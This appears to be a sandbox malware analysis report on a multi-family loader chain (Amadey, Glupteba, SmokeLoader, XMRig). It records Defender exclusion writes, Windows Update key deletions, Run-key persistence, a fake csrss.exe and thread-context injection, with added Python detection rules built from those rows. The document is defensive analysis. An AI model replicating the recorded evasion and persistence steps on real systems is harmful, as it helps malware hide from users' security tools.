Malware Analysis Report

2025-08-10 17:39

Sample ID 230625-mhek7aeg3z
Target fileexe.exe
SHA256 5aad31095b0b9a429fed8773a233eb872868467d33f52b9d6f6e7fa078092011
Tags
amadey fabookie gcleaner glupteba smokeloader xmrig up3 backdoor discovery dropper evasion loader miner persistence rootkit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5aad31095b0b9a429fed8773a233eb872868467d33f52b9d6f6e7fa078092011

Threat Level: Known bad

The file fileexe.exe was found to be: Known bad.

Malicious Activity Summary

amadey fabookie gcleaner glupteba smokeloader xmrig up3 backdoor discovery dropper evasion loader miner persistence rootkit spyware stealer trojan upx

Glupteba payload

Glupteba

GCleaner

xmrig

Amadey

Detect Fabookie payload

Fabookie

Modifies security service

SmokeLoader

Suspicious use of NtCreateUserProcessOtherParentProcess

Windows security bypass

XMRig Miner payload

Modifies boot configuration data using bcdedit

Stops running service(s)

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Downloads MZ/PE file

Drops file in Drivers directory

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

UPX packed file

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Manipulates WinMon driver.

Manipulates WinMonFS driver.

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Detects videocard installed

Modifies system certificate store

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Creates scheduled task(s)

Modifies data under HKEY_USERS

Kills process with taskkill

Suspicious behavior: LoadsDriver

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-25 10:27

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 10:27

Reported

2023-06-25 10:30

Platform

win7-20230621-en

Max time kernel

146s

Max time network

148s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A (13 hits; the report records no indicator, process or target for this signature)

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security C:\Windows\System32\reg.exe N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (6 hits; the report records no indicator, process or target for this signature)

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (25 hits; the report records no indicator, process or target for this signature)

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
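Read together, the "Modifies security service" rows earlier in this section and the two Defender exclusion tables ("Windows security bypass" and "Windows security modification", which fire on the same events) describe one evasion pattern: the stage-two dropper 3eef203fb515bda85f514e168abb5973.exe registers Windows Defender exclusions for its own process name and for the directories, file names and process names the rest of the chain uses (C:\Windows\rss, csrss.exe, windefender.exe, System32\drivers), while reg.exe deletes the Parameters and Security subkeys of the Windows Update service (wuauserv). The following Python is an added example, not part of this report or of any sandbox vendor's code. It parses registry rows in the report's own column layout (description, key, value, process, target) and applies two rules: any write under the Defender Exclusions key by a process other than Defender's own components, with a flag when the writer excludes itself, and any deletion of a subkey under a service's registry entry. The sample rows are copied from this report; the trusted-writer list is an assumption and must be tuned for environments that manage exclusions through policy engines.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: registry rows copied verbatim from this report's
# "Modifies security service" and "Windows security bypass" tables, plus one
# MuiCache row (a write Windows performs on its own) as a negative control.
REPORT_ROWS = [
    r'Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A',
    r'Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security C:\Windows\System32\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" C:\Windows\windefender.exe N/A',
]

# One row = operation, native registry key, optional '= "value"', process path, target.
ROW_RE = re.compile(
    r'^(?P<op>Set value \(\w+\)|Key deleted|Key created) '
    r'(?P<key>\\REGISTRY\\.+?)'
    r'(?: = "(?P<value>.*?)")? '
    r'(?P<process>[A-Za-z]:\\.+?\.exe)\s+'
    r'(?P<target>N/A|[A-Za-z]:\\.+)$'
)

EXCLUSIONS = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\"
SERVICES = "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\services\\"
# Assumption: only Defender's own binaries legitimately write exclusions. Sites that
# push exclusions via Group Policy or an MDM agent must add that agent here.
TRUSTED_EXCLUSION_WRITERS = {"msmpeng.exe", "mpcmdrun.exe"}
HIVES = {"\\REGISTRY\\MACHINE": "HKLM", "\\REGISTRY\\USER": "HKU"}


@dataclass
class RegEvent:
    op: str
    key: str
    value: Optional[str]
    process: str
    target: str


@dataclass
class Finding:
    rule: str            # "defender-exclusion" or "service-key-deleted"
    kind: str            # Paths / Processes / Extensions, or the service name
    item: str            # excluded path or process name, or the deleted subkey
    process: str         # writer, as logged by the sandbox
    self_exclusion: bool = False
    trusted_writer: bool = False


def parse_rows(rows: List[str]) -> List[RegEvent]:
    """Parse the report's registry rows; rows with no indicator (N/A) are skipped."""
    events = []
    for row in rows:
        m = ROW_RE.match(row)
        if m:
            events.append(RegEvent(**m.groupdict()))
    return events


def friendly(key: str) -> str:
    """Rewrite the native object-manager path into the HKLM/HKU form analysts use."""
    for prefix, short in HIVES.items():
        if key.upper().startswith(prefix):
            return short + key[len(prefix):]
    return key


def triage(rows: List[str]) -> List[Finding]:
    findings = []
    for ev in parse_rows(rows):
        writer = ntpath.basename(ev.process).lower()
        low = ev.key.lower()
        if low.startswith(EXCLUSIONS.lower()):
            kind, _, item = ev.key[len(EXCLUSIONS):].partition("\\")
            # Self-exclusion: the writer excludes its own image name or its own directory.
            self_excl = item.lower() == writer or ev.process.lower().startswith(item.lower() + "\\")
            findings.append(Finding("defender-exclusion", kind, item, ev.process,
                                    self_exclusion=self_excl,
                                    trusted_writer=writer in TRUSTED_EXCLUSION_WRITERS))
        elif ev.op == "Key deleted" and low.startswith(SERVICES.lower()):
            svc, _, sub = ev.key[len(SERVICES):].partition("\\")
            findings.append(Finding("service-key-deleted", svc, sub, ev.process))
    return findings


if __name__ == "__main__":
    for f in triage(REPORT_ROWS):
        flags = " [self-exclusion]" if f.self_exclusion else ""
        print(f"{f.rule}: {f.kind}\\{f.item}{flags} by {f.process}")
```

The MuiCache row produces nothing, the two reg.exe rows become service-key-deleted findings for wuauserv, and the seven exclusion rows become four Paths and three Processes findings, one of them a self-exclusion. The exclusions name files that the same chain drops (C:\Windows\rss\csrss.exe, C:\Windows\windefender.exe, System32\drivers\Winmon.sys), so a rule keyed on the registry write catches the chain independently of whether the dropped files are ever scanned.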

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3297628651-743815474-1126733160-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3297628651-743815474-1126733160-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1168 set thread context of 772 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 1608 set thread context of 1968 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 1608 set thread context of 1560 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe
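The three rows above show two different uses of SetThreadContext. toolspub2.exe (PID 1168) rewrites the thread context of PID 772, a second instance of its own image, which is how a packed loader hands control to an unpacked copy of itself. updater.exe (PID 1608), the file XandETC.exe dropped under C:\Program Files\Notepad\Chrome and the same image that writes WR64.sys, does it twice to freshly spawned conhost.exe processes, placing its payload inside a Windows binary. The following Python is an added example, not the sandbox's own logic, that parses these rows in the report's column layout and labels each event by that distinction, then lists injectors that used more than one host; the sample rows are copied from this report and the system-directory list is an assumption.

```python
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Assumption: images under these directories are treated as Windows' own binaries.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Constructed sample: the three rows of this report's "Suspicious use of
# SetThreadContext" table (description, indicator, process, target).
REPORT_ROWS = [
    r"PID 1168 set thread context of 772 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe",
    r"PID 1608 set thread context of 1968 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe",
    r"PID 1608 set thread context of 1560 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe",
]

ROW_RE = re.compile(
    r"^PID (?P<src_pid>\d+) set thread context of (?P<dst_pid>\d+) N/A "
    r"(?P<src>[A-Za-z]:\\.+?\.exe) (?P<dst>[A-Za-z]:\\.+?\.exe)$"
)


@dataclass
class ContextEvent:
    src_pid: int
    dst_pid: int
    src: str   # image of the process that called SetThreadContext
    dst: str   # image of the process whose thread was modified


def parse_rows(rows: List[str]) -> List[ContextEvent]:
    events = []
    for row in rows:
        m = ROW_RE.match(row)
        if m:  # rows whose indicator is N/A carry nothing to parse
            events.append(ContextEvent(int(m["src_pid"]), int(m["dst_pid"]), m["src"], m["dst"]))
    return events


def _under(path: str, roots: Tuple[str, ...]) -> bool:
    p = path.lower()
    return any(p == r or p.startswith(r + "\\") for r in roots)


def classify(ev: ContextEvent) -> str:
    """Label a cross-process SetThreadContext by what the image pair implies.

    Same image on both sides: the parent re-launched its own binary and
    redirected the child's entry point (an unpacking stage).
    Target under a system directory: the caller is reusing a Windows binary
    as a host for code the binary never contained (process hollowing)."""
    if ev.src.lower() == ev.dst.lower():
        return "self-replacement"
    if _under(ntpath.dirname(ev.dst), SYSTEM_DIRS):
        return "hollowed-system-host"
    return "cross-process-injection"


def triage(rows: List[str]):
    """Return per-event labels and the injectors that hollowed more than one host."""
    events = parse_rows(rows)
    labels = [(ev.src_pid, ev.dst_pid, classify(ev)) for ev in events]
    hosts: Dict[Tuple[int, str], List[int]] = defaultdict(list)
    for ev in events:
        if classify(ev) != "self-replacement":
            hosts[(ev.src_pid, ev.src)].append(ev.dst_pid)
    repeat = {k: v for k, v in hosts.items() if len(v) > 1}
    return labels, repeat


if __name__ == "__main__":
    labels, repeat = triage(REPORT_ROWS)
    for src_pid, dst_pid, label in labels:
        print(f"PID {src_pid} -> PID {dst_pid}: {label}")
    for (pid, image), targets in repeat.items():
        print(f"PID {pid} ({image}) hollowed {len(targets)} hosts: {targets}")
```

On a live host the same split applies to EDR process-access or thread-modification telemetry: the self-replacement case is noisy (installers and packers do it) and is best used as context, while a non-system image writing the thread context of a System32 process it just spawned is worth an alert on its own.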

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Notepad\Chrome\updater.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Notepad\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20230625102804.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
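The Run key, driver, Program Files and Windows-directory rows above share one theme: executables are written where system binaries live, either under a system-binary name (csrss.exe in C:\Windows\rss, which the Run key then launches) or under a product-sounding name (C:\Windows\windefender.exe, Notepad\Chrome\updater.exe, Google\Libs\WR64.sys), and the writer is a process running from the user's Temp directory or from a file that was itself dropped this way. The following Python is an added example, not the sandbox's own logic, that applies three path-based rules to (created file, creating process) pairs copied from this report and decodes the Run value exactly as the report prints it. The directory and name lists are assumptions kept deliberately small; a production rule would key on the Authenticode signer as well, which these sandbox rows do not record.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Assumptions: path policy used by the rules below.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
TRUSTED_CREATOR_DIRS = SYSTEM_DIRS + (r"c:\windows\winsxs",)
PROTECTED_ROOTS = (r"c:\windows", r"c:\program files", r"c:\program files (x86)")
SYSTEM_BINARY_NAMES = {"csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe",
                       "services.exe", "lsass.exe", "svchost.exe", "conhost.exe"}
BINARY_EXTS = {".exe", ".dll", ".sys"}

# Constructed sample: (created file, creating process) pairs copied from this report's
# "Drops file in Drivers/Program Files/Windows directory" tables. The CbsPersist row is
# the negative control: a System32 binary writing a non-executable into its own log directory.
FILE_DROPS = [
    (r"C:\Windows\system32\drivers\Winmon.sys", r"C:\Windows\rss\csrss.exe"),
    (r"C:\Program Files\Google\Libs\WR64.sys", r"C:\Program Files\Notepad\Chrome\updater.exe"),
    (r"C:\Program Files\Notepad\Chrome\updater.exe", r"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"),
    (r"C:\Windows\rss\csrss.exe", r"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"),
    (r"C:\Windows\Logs\CBS\CbsPersist_20230625102804.cab", r"C:\Windows\system32\makecab.exe"),
    (r"C:\Windows\windefender.exe", r"C:\Windows\rss\csrss.exe"),
]
# The Run value as the report prints it: REG_SZ data with quotes and backslashes escaped.
RUN_VALUE_RAW = r'"\"C:\\Windows\\rss\\csrss.exe\""'


def _under(path: str, roots: Tuple[str, ...]) -> bool:
    p = path.lower()
    return any(p == r or p.startswith(r + "\\") for r in roots)


def decode_report_value(raw: str) -> str:
    """Strip the report's outer quotes and undo its backslash escaping."""
    if not (raw.startswith('"') and raw.endswith('"')):
        raise ValueError("expected a quoted REG_SZ value")
    return re.sub(r"\\(.)", r"\1", raw[1:-1])


def image_from_command(cmd: str) -> str:
    """First token of a command line, honouring a quoted image path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.index('"', 1)]
    return cmd.split(" ", 1)[0]


def is_masquerading_system_binary(path: str) -> bool:
    """A protected-process name living anywhere but System32/SysWOW64."""
    return (ntpath.basename(path).lower() in SYSTEM_BINARY_NAMES
            and not _under(ntpath.dirname(path), SYSTEM_DIRS))


def check_file_drop(path: str, creator: str) -> List[str]:
    hits = []
    ext = ntpath.splitext(path)[1].lower()
    if is_masquerading_system_binary(path):
        hits.append("R1 system-binary name outside System32")
    if ext in BINARY_EXTS and _under(path, PROTECTED_ROOTS) and not _under(creator, TRUSTED_CREATOR_DIRS):
        hits.append("R2 binary written into protected location by untrusted creator")
    if ext == ".sys" and not _under(creator, SYSTEM_DIRS):
        hits.append("R3 driver file written by non-system process")
    return hits


def triage_drops(drops) -> Dict[str, List[str]]:
    return {path: check_file_drop(path, creator) for path, creator in drops}


def check_run_value(raw_value: str) -> Tuple[str, bool]:
    """Decode a Run entry as printed by the report and test the launched image."""
    image = image_from_command(decode_report_value(raw_value))
    return image, is_masquerading_system_binary(image)


if __name__ == "__main__":
    for path, hits in triage_drops(FILE_DROPS).items():
        print(path, "->", hits or "clean")
    print("Run key launches", *check_run_value(RUN_VALUE_RAW))
```

Run against the rows above, the CbsPersist cab is the only clean drop; C:\Windows\rss\csrss.exe trips the masquerade rule and the untrusted-creator rule, both .sys files trip the driver rule, and the Run value decodes to C:\Windows\rss\csrss.exe, a csrss.exe outside System32. The rules chain naturally: the creator of Winmon.sys and windefender.exe is itself a file flagged by the earlier rows.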

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" C:\Windows\windefender.exe N/A
